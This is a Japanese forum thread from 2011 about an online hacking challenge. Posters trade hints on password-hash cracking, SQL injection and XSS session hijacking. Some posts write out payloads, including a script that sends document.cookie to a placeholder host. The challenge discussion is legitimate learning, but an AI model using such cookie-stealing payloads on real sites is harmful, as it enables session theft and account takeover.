374 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:33:00.02
ブルートフォース解禁して欲しいw
力押し一度やってみたい。
力押し一度やってみたい。
375 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:34:00.17
376 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:34:07.90
鯖飛ぶじゃねーかw
377 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:34:25.91
378 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:35:28.19
>>377
100の解き方があっても1つの解き方じゃないとダメだからな・・・
100の解き方があっても1つの解き方じゃないとダメだからな・・・
379 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:36:07.76
ネットファイアの技術力アピールのつもりが、技術力の低さをアピールする結果にw
380 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:40:47.71
>>378
一応Lv2はバリエーション増えてるみたいだけどね。それでもちょっと少なすぎる感はある
一応Lv2はバリエーション増えてるみたいだけどね。それでもちょっと少なすぎる感はある
381 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:41:10.68
だいたい、ちょっと答えをばらされたぐらいで停止措置しなきゃいけないとか、
何でこの程度の事も予測できていないの?って言いたいね。
まるで行き当たりばったり。
あらかじめ予測してすぐに対処できるように準備するのはセキュリティのイロハのイでしょうが。
こんな会社に仕事任せるのは怖くてできないわ。
何でこの程度の事も予測できていないの?って言いたいね。
まるで行き当たりばったり。
あらかじめ予測してすぐに対処できるように準備するのはセキュリティのイロハのイでしょうが。
こんな会社に仕事任せるのは怖くてできないわ。
382 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:41:40.19
rベル4のログイン失敗したやつってなんだ?
383 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:42:17.01
alpha版なんかださずに全部実装してからだせばいいものを、そしたらエラーも正しいの返ってくるのに
384 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:42:26.77
>>381
いまさらそこが止まったところでクリア済みの人には影響ないし、いいんじゃないの
いまさらそこが止まったところでクリア済みの人には影響ないし、いいんじゃないの
385 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:42:51.71
最初の方に試したスクリプトが
いつの間にかOKレベルになってたらショックだよ・・・
そうでないことを願おう。
いつの間にかOKレベルになってたらショックだよ・・・
そうでないことを願おう。
386 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:53:20.34
おまいらlv4どのブラウザつかってる?
387 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:54:00.35
FireFox
388 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:55:25.24
>>386
perl+WWW::Mechanize
perl+WWW::Mechanize
389 :名無しさん@お腹いっぱい。:2011/02/24(木) 18:59:11.35
俺クロームで
糞更新もふまえて
UA書きかえるの地獄なんだけど
糞更新もふまえて
UA書きかえるの地獄なんだけど
390 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:04:38.32
chromeってcookie編集できなくね
391 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:05:04.91
webkit系でやりたいならIronにしとけ
392 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:06:09.44
レベル3ってMD5の解析せずにパスワードを知る方法無いの?
393 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:06:52.62
>>392
MD5についてぐぐれ
MD5についてぐぐれ
394 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:07:38.49
>>390
っ拡張
っ拡張
395 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:12:16.09
396 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:13:36.15
>>393
MD5はデコードできないんでしょ?ツール使うのは頭悪そうだから他に方法無いのかなって思いました。
MD5はデコードできないんでしょ?ツール使うのは頭悪そうだから他に方法無いのかなって思いました。
397 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:13:39.59
オミトロン使えよ
398 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:14:13.33
しかし、いい客寄せ宣伝になったな。
399 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:15:04.65
やっとLv4クリアできた
途中の仮定操作に詰まってたよ
途中の仮定操作に詰まってたよ
400 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:19:41.76
LV4てマジで外部鯖に送信しないとダメなの?
401 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:21:49.67
投げつけてもアクセスこないと思うんだが…。
402 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:27:17.49
sessionidは盗んだ・・自分のクッキー変えたら自分のセッションなくなるよな・・・あれ?
403 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:31:25.74
>>402
「盗んだ」?盗めたの?
「盗んだ」?盗めたの?
404 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:32:57.72
Lv4がわからん。
javascript:〜
style="x:expression(〜
も通らん。なんだこれ。
javascript:〜
style="x:expression(〜
も通らん。なんだこれ。
405 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:33:00.34
Lv3はシングルクラックでオッケーなん?
406 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:33:10.21
自分のセッションIDとかいう落ちだったりしねーよな・・・
407 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:35:45.10
408 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:39:41.91
馬鹿がつられとるw
409 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:41:11.88
俺lv3突破できないよ
ここに晒されてるのと同じパスだったが・・・
ここに晒されてるのと同じパスだったが・・・
410 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:41:35.66
パス変更したそうだから自力でがんばれ
411 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:44:19.29
412 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:45:57.62
>>411
twitter見ると、ファイルの値が変更されてないから進めんとかいうのあるけど、一応試してみるといいかも
twitter見ると、ファイルの値が変更されてないから進めんとかいうのあるけど、一応試してみるといいかも
413 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:46:32.13
>>403
うん
うん
414 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:47:48.25
415 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:48:41.43
ついにlv4もネタバレが載っちまうのか・・・
416 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:50:42.47
>>407
試みた。おっけ、出来た。パスはわかった、がIDがわからん
試みた。おっけ、出来た。パスはわかった、がIDがわからん
417 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:52:57.20
418 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:55:34.34
セッションid盗むにしても過去にさかのぼって盗めるこたぁないから
スクリプトがあっていれば何かしら擬似的な反応が返ってくるんだろ?
しかもnetfireサイト上で反応が返ってくるんだろ?
じゃないとサーバー持ってるやつしか解けないよな・・・?
スクリプトがあっていれば何かしら擬似的な反応が返ってくるんだろ?
しかもnetfireサイト上で反応が返ってくるんだろ?
じゃないとサーバー持ってるやつしか解けないよな・・・?
419 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:57:46.92
レベル4にログイン履歴なんてあったか?
420 :名無しさん@お腹いっぱい。:2011/02/24(木) 19:58:52.28
てかこのログの書き方が悪い気がする、時系列おかしくないか
421 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:01:05.80
>>418
ばーか
ばーか
422 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:01:43.22
あれ?Lv3でshadowが見れなくなってる
423 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:04:14.53
424 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:07:17.85
セッションID盗めたんなら>>402の発言はおかしいがなw
本気で言ってんならよく確認しろw
本気で言ってんならよく確認しろw
425 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:07:35.90
Lv3は辞書でだめだったんで総当たりでやっと見つけて入れたらNG
なんでだ?って思ったらお前らがばらしてたのかよ
どうすんだよこれ・・
でもこのツール、10年位ぶりに使って懐かしかったw
なんでだ?って思ったらお前らがばらしてたのかよ
どうすんだよこれ・・
でもこのツール、10年位ぶりに使って懐かしかったw
426 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:08:13.71
全力でLv3に取り組んでいる中学生。
シャドウファイルまでは行き着いたんだがなぁ・・・・
シャドウファイルまでは行き着いたんだがなぁ・・・・
427 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:09:34.59
>>426
おまえみたいな頭の悪いガキはいくらでもいるよ
おまえみたいな頭の悪いガキはいくらでもいるよ
428 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:17:05.44
>>424
ほんとだw、sessionidなんだろうけどsessionidじゃなかったw
ほんとだw、sessionidなんだろうけどsessionidじゃなかったw
429 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:18:19.10
lv3突破できた!
シャドウファイルが無くなったのはヒントだったのですね
ではlv4へ生かせていただきます!
シャドウファイルが無くなったのはヒントだったのですね
ではlv4へ生かせていただきます!
430 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:22:57.51
lv3余裕すぎワロタ
431 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:23:08.38
やり直しかよ。ちぇ
432 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:28:24.03
門外漢の俺には、lv4で鯖だけは避けたかった。
てか、鯖ってなんだ?鯖側の受け入れ設定とか必要なの?
てか、鯖ってなんだ?鯖側の受け入れ設定とか必要なの?
433 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:29:38.54
>>432
鯖?んなもんいらん
鯖?んなもんいらん
434 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:29:38.69
Lv3変わったって書いてあったから見に行ったら殆ど変わってなくてワロタ
435 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:32:26.73
436 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:34:45.06
437 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:37:10.69
Lv3ほとんど変わってないwwww変わったことといえばパスワードが適当じゃなくなった感じ
438 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:50:06.17
今日でchromeの拡張が2個増えた
439 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:52:22.64
何入れたの
440 :名無しさん@お腹いっぱい。:2011/02/24(木) 20:58:32.97
UAいじるのとcookieいじるの
UAはいちいち起動オプションに設定するのが面倒だったからいれた
UAはいちいち起動オプションに設定するのが面倒だったからいれた
441 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:04:57.11
442 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:08:09.88
別に釣りではないとおもうけど、ログを最近の状況じゃなくて未来の状況って書いてほしかったw
443 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:13:31.43
わかんねーw
UAしかログに残らないのに、そこに正規ユーザーのsessionidを書き込める?
UAしかログに残らないのに、そこに正規ユーザーのsessionidを書き込める?
444 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:17:40.25
にしてもいやなログイン履歴だな
445 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:18:11.49
Lv3がわからない俺は馬鹿なのか・・・。
暗号化されたパスワードはみつけたみたいなんだけど・・・。
暗号化されたパスワードはみつけたみたいなんだけど・・・。
446 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:22:24.08
>>402
おれもセッションIDは盗めたんだけど、使い方がわからんwww
おれもセッションIDは盗めたんだけど、使い方がわからんwww
447 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:24:04.80
使い方教えてやるから盗み方教えて
448 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:25:54.84
盗んだとか言ってるやつ、普通に自分のsessionidを盗んだものとか勘違いしてんじゃねえのかw
449 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:27:22.44
誰かに踏ませるわけでも無いだろうしどう盗めと。
450 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:31:53.45
盗めるよ。
俺も >>449 と同じこと考えてたんだけど、騙されたと思ってやってみ。
俺も >>449 と同じこと考えてたんだけど、騙されたと思ってやってみ。
451 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:33:01.83
452 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:36:34.16
直近5件ってもしかして一番下が最新って設定?
453 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:36:37.19
というか、誰かLv3のヒントか答え教えてくれ。。。
シャドウファイルは解析しないとだめなのか・・?
シャドウファイルは解析しないとだめなのか・・?
454 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:38:36.95
shadowファイルが本来の場所にないけどどこにあるんだよ
455 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:40:11.57
master.passwd
456 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:40:12.31
lv5が不明すぎる
457 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:41:27.24
458 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:42:41.14
>>455
BSDになったのか
BSDになったのか
459 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:45:07.96
>>455
ヒントすぎんぞw
ヒントすぎんぞw
460 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:46:08.86
>>452だとすれば解き方はわかったかも。
461 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:46:16.95
LV4が鯖必要なのかだけでも知りたいな。
462 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:46:29.70
さてはLinuxしか使ったことないな
463 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:53:39.13
Lv.2がわからねえ
エラーでたが、その後が・・・
エラーでたが、その後が・・・
464 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:56:02.40
>>450 です。Lv4 クリアしました。
465 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:56:42.00
466 :名無しさん@お腹いっぱい。:2011/02/24(木) 21:58:10.81
467 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:01:02.37
そういやLv1。
うちの環境だと右クリック禁止です。って出たあとにコンテキストメニューがでるw
うちの環境だと右クリック禁止です。って出たあとにコンテキストメニューがでるw
468 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:01:26.81
dolpen...
469 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:08:30.95
はい…
470 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:13:57.45
471 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:19:59.09
Lv3のヒント教えてクレーorz
472 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:23:25.21
今頃スレ読んでるんだけど、
>>405はGUIでやってるんだよな?
GUIは辞書クラックじゃないと駄目
GUIでクラック1回やって成功すると次から出来なくなるので生成されたファイルを削除しないと次が出来なくなる
更に言えば色々不具合あるからDOS画面でやったほうがいい
>>405はGUIでやってるんだよな?
GUIは辞書クラックじゃないと駄目
GUIでクラック1回やって成功すると次から出来なくなるので生成されたファイルを削除しないと次が出来なくなる
更に言えば色々不具合あるからDOS画面でやったほうがいい
473 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:23:57.75
>>471
Lv3はもう答えに近いものが出てるぞ
Lv3はもう答えに近いものが出てるぞ
474 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:24:47.04
鯖使わないなら何なんだ・・・知識が無い
475 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:26:33.77
LV4なんとなくわかったけど、どうすんだこれ。書き換えできん。
間違ってるだけなのかもしれんが
間違ってるだけなのかもしれんが
476 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:28:37.69
477 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:32:14.60
何でこんな低レベルな問題ぐらいでハッカー扱いなのか分からん。
478 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:35:18.04
479 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:37:03.63
480 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:37:44.23
Lv4 難しそう・・・
481 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:38:35.10
Lv5はこの会社の製品テストか
時間の無駄だった
時間の無駄だった
482 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:38:54.57
解けてないけど直近5件のログイン状況っていう文字列が勘違いさせられてる原因な気がする
483 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:45:18.26
484 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:45:29.18
Lv5は成功者が出ないうちは考え始めないほうが生産性高そう。
裏はGAEだから製品プロモではないにしても、広告PV増やすためのダミーな気が…
裏はGAEだから製品プロモではないにしても、広告PV増やすためのダミーな気が…
485 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:47:25.85
URLの「Lv4/?」の?って意味あんのかなーとか、alertって入れた時しか「スクリプトが実行可能なようです」って出ないけどそうじゃない場合は全部無効なのかなーとか色々気になる
Lv3までは簡単だがLv4からはどうなのだろう
487 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:52:29.94
/ / ',. \ ヽ
/ / ;. ,,,,, ヽ )
{ ./ ', ,,.'''" `ヽ 彡
! i ' , ,,,,, ,r''(・)ヽ 彡
i ミ 〃 ゙゙゙゙'' ′.`"´,/ ヾ.
. ', ( ,r'(・ )`'ヽ `'''''" !
', 彡 `"´ ノ } ゝ { もっと答えちょうだい〜
', 〆、ミ ー- ''" ( ,、_ッ^′ i
'{ ⌒ ,,___,. / .}
\ i、 -‐"ニ' i´ / ノ
i Uヽ ,,,,ノ i /
\,,,ノi \ {./
/ / ;. ,,,,, ヽ )
{ ./ ', ,,.'''" `ヽ 彡
! i ' , ,,,,, ,r''(・)ヽ 彡
i ミ 〃 ゙゙゙゙'' ′.`"´,/ ヾ.
. ', ( ,r'(・ )`'ヽ `'''''" !
', 彡 `"´ ノ } ゝ { もっと答えちょうだい〜
', 〆、ミ ー- ''" ( ,、_ッ^′ i
'{ ⌒ ,,___,. / .}
\ i、 -‐"ニ' i´ / ノ
i Uヽ ,,,,ノ i /
\,,,ノi \ {./
488 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:53:22.46
>>481
これGAEだぞ。
これGAEだぞ。
489 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:57:09.28
「スクリプトが実行可能なようです」は、苦肉の策だろうから、額面どおりに受け取ってあげてくれ。
490 :名無しさん@お腹いっぱい。:2011/02/24(木) 22:59:22.97
だって意味わかんねえじゃん
なんでalertだけ通るんだよ
そんな情況ありえないだろ
なんでalertだけ通るんだよ
そんな情況ありえないだろ
491 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:04:59.11
alert通る状態って実際ならやり放題的な状況な気がするんだけど
全然コードが通らなくてなんかもやもやする
全然コードが通らなくてなんかもやもやする
492 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:06:11.59
(´・ω・`)LV2からむりなんだわ
493 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:10:05.11
>>490
やっ、まあそれはそうなんだけどさwww
あくまで、Hackme の脆弱性は、人工的に作られた脆弱性。
そんな事いったら、Lv2 で本来なら間違いなく通るはずのSQLを散々叩いて
あげく、それをチョロッと変形させただけの「出題者が期待するSQL」がスルッと
通って、若干ムカついた俺のような奴も居るわけで・・・。
やっ、まあそれはそうなんだけどさwww
あくまで、Hackme の脆弱性は、人工的に作られた脆弱性。
そんな事いったら、Lv2 で本来なら間違いなく通るはずのSQLを散々叩いて
あげく、それをチョロッと変形させただけの「出題者が期待するSQL」がスルッと
通って、若干ムカついた俺のような奴も居るわけで・・・。
494 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:11:12.79
>>493
確かにあれにむかついた人は多いはず
確かにあれにむかついた人は多いはず
495 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:11:58.61
Lv2はよくあるインジェクションに一手間加えれば通るよな
きっちりエスケープもされるし
きっちりエスケープもされるし
同意
497 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:13:31.10
不正解です!とかはっきり出してくれればいいのに
498 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:14:55.38
UAにスクリプトしこんどくっていうのは違う?
499 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:15:16.84
>>491
これは本当にそう思う。
alert 通るなら・・・
こう書いたら、こう言う動きになる ⇒ あれ? ならねえ。
ってのが普通にあるからな。
だから、色々試してみて、ちょっとずつ間合いを積めるってのがやり難い。
ある程度(こう言う脆弱性があるんだろうと言う)正解の道筋が見えてないと
厳しいね。
これは本当にそう思う。
alert 通るなら・・・
こう書いたら、こう言う動きになる ⇒ あれ? ならねえ。
ってのが普通にあるからな。
だから、色々試してみて、ちょっとずつ間合いを積めるってのがやり難い。
ある程度(こう言う脆弱性があるんだろうと言う)正解の道筋が見えてないと
厳しいね。
500 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:15:57.12
lv3 50人ちょっと通過したか
501 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:16:30.99
今日の0時は150人もいなかったのにな
502 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:18:25.20
スクリプトが実行可能なようですw
なら実行させさせてくれよw
なら実行させさせてくれよw
503 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:19:19.55
作者の想定した方法しか通らないからなw
単体だと正常にエンティティ化される→脆弱性ないと判断
が、組み合わせるとエンティティ化されずに通るとか罠すぎる。
単体だと正常にエンティティ化される→脆弱性ないと判断
が、組み合わせるとエンティティ化されずに通るとか罠すぎる。
504 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:20:17.38
スクリプトが実行可能なようですってどう出すの?
てかUAにスクリプトって仕込めるのか?
てかUAにスクリプトって仕込めるのか?
505 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:20:19.87
506 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:23:46.15
507 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:26:17.95
XSSを踏んだhogehogeがsessionidを露出させるようなスクリプト?そんなの知らねえー
508 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:28:31.94
Lv2突破した人に聞きたいんだけど、普通のSQLインジェクションが通らない理由は
ちゃんとあるの?それとも作者の用意したパターンに合致しない限り駄目なだけ?
ちゃんとあるの?それとも作者の用意したパターンに合致しない限り駄目なだけ?
509 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:29:49.36
>>508
エスケープがきちんとされてるとしたら通らない理由もわかると思う
エスケープがきちんとされてるとしたら通らない理由もわかると思う
510 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:31:10.44
いつの間にかLv3クリアした人が600人超えてたww
512 :名無しさん@お腹いっぱい。::2011/02/24(木) 23:34:22.27
どっかのアホがIDとPW公開したから増えたんだよ
513 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:35:08.26
本物の脆弱性を仕込んでほしいなー
ユーザ毎にサンドボックスみたいなの用意するのは無理なのかしら
ユーザ毎にサンドボックスみたいなの用意するのは無理なのかしら
514 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:36:33.37
515 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:36:39.18
>>513
GAEだぞ
GAEだぞ
516 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:38:19.07
>>509
だいたいにしてあんなに綺麗に「こちらの入力した文字列だけ」が
エラーとして表示されるわけはないので
そこで解析の思考が止まってしまうんだよなー
すでにありえない敵を相手してる前提になってしまう
だいたいにしてあんなに綺麗に「こちらの入力した文字列だけ」が
エラーとして表示されるわけはないので
そこで解析の思考が止まってしまうんだよなー
すでにありえない敵を相手してる前提になってしまう
517 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:39:05.97
ぶっちゃけこういうことがしたいのにGAEなんかで実装してる時点で企業の力量が知れるわなww
518 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:39:22.51
このスレのやつらが本気で作ったらもっとすごいのができそうだなw
519 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:40:26.20
<script>document.location="httpp://xxx.xxx/?cookie="+document.cookie</script>
も通らないなー
も通らないなー
520 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:40:39.75
lv4はどういうコード書けばいいの?
どっかに転送させるの?その場に表示させるの?
どっかに転送させるの?その場に表示させるの?
521 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:42:31.85
>>520
それに答えちゃうと、そのまま正解になってしまう・・・ってのがヒント。
それに答えちゃうと、そのまま正解になってしまう・・・ってのがヒント。
522 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:42:46.20
変な置換処理の所為で一向に進まねえ!
523 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:43:56.72
524 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:46:20.09
>>519
だから外部鯖はいらんといってるだろ。ログ見たのかよ。
だから外部鯖はいらんといってるだろ。ログ見たのかよ。
525 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:48:15.02
1911
526 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:49:08.22
527 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:49:13.95
528 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:49:28.60
<script>alert(document.cookie)</script>
なぜ↑が効かないんだ〜〜〜〜
なぜ↑が効かないんだ〜〜〜〜
529 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:49:51.85
社員張り付きすぎワロタ
530 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:50:14.82
>>528
それが通って何の意味があるのかと
それが通って何の意味があるのかと
531 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:51:05.11
532 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:52:25.70
>>528
それが効いたとしても自分の cookie の値がわかるだけじゃね?
それが効いたとしても自分の cookie の値がわかるだけじゃね?
533 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:53:29.39
528フルボッコワロタ
534 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:54:06.75
時系列上から下だよな多分
とはいっても、これに挑戦している人は9万人越えらしいが実際にLv3クリアして増してやLv4もクリアした人はかなり少ないんだな。
536 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:55:04.34
<script>document.location="http://hackme.netfire.jp/Lv5/login"</script>
も通らんな。
も通らんな。
537 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:55:38.62
テスト方法として>>528みたいなことを試す人はいるだろw
538 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:56:12.66
自鯖使わずにhogehogeのsessionidとやらを抜き出す方法なんてどう考えても思いつかん。UAってjavascriptで変えられるのか?
539 :名無しさん@お腹いっぱい。:2011/02/24(木) 23:59:34.56
LV4はなんだ
決まった処理じゃないとscriptの内容消されるのか
決まった処理じゃないとscriptの内容消されるのか
540 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:01:11.20
>>538
UA変える方法は、いくらでもあるでしょ?
UA変える方法は、いくらでもあるでしょ?
541 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:01:46.18
LV4 のログって上と下どっちが新しいの?
542 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:03:00.62
>>541
多分下。じゃないと何もできないと思う。
多分下。じゃないと何もできないと思う。
543 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:05:04.16
>>541
上だよ。これを踏まえればログが何を意図してるかが分かる。
上だよ。これを踏まえればログが何を意図してるかが分かる。
544 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:05:58.75
545 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:06:03.36
foobarがログイン中ってことだ
546 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:06:47.73
こう書いたらこうなってこうなります。ってのがあるんだろうな
って上なのかよ。
って上なのかよ。
547 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:07:06.45
風婆め、そのセッションをこっちによこせと
548 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:08:22.10
Lv4も9割方ネタバレされてるからまたメンテ入りそうだなw
549 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:09:02.78
やっとLv4クリア
でも、これはちょっとおかしいよな
まぁ脱出ゲームみたいなもんか
でも、これはちょっとおかしいよな
まぁ脱出ゲームみたいなもんか
550 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:09:54.38
Lv5・・・。
できねぇ・・・。どうやったらいけるか?
できねぇ・・・。どうやったらいけるか?
552 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:11:21.48
やっぱ上かー。
そうなると foobar のセッションをジャックするしかないと思うんだけど、でも foobar はすでにログインしてるんだからログのページにスクリプト仕組んだところで見に来なくね?
そうなると foobar のセッションをジャックするしかないと思うんだけど、でも foobar はすでにログインしてるんだからログのページにスクリプト仕組んだところで見に来なくね?
553 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:12:02.00
>>552
それが気になってしょうがない
それが気になってしょうがない
554 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:13:05.09
問題がクソな気がしてならない
555 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:13:08.74
>>552
そう思っていた時期が俺にもありました。
そう思っていた時期が俺にもありました。
556 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:13:46.76
lv4は作成者が問題よくないって言ってたからなww
557 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:14:28.86
独自解釈で上が最新のログとした後に自分のログを一番したにもっててかつログインできてないのに
先にセッションつくっちゃうクソwebアプリとして考えたw
先にセッションつくっちゃうクソwebアプリとして考えたw
558 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:15:41.14
日本語でおk
559 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:16:16.07
Foobarさんはログイン成功したのに成功画面リロードしてるお茶目さん。
560 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:16:46.82
UAに<script>〜</script>を書くだけの簡単なお仕事
561 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:18:57.21
確かに問題が「クソ」かもしれない
でもこの辺りが落とし所なのかもとも思うね
でもこの辺りが落とし所なのかもとも思うね
562 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:22:01.27
Lv4はIE6.0ってのもヒント?
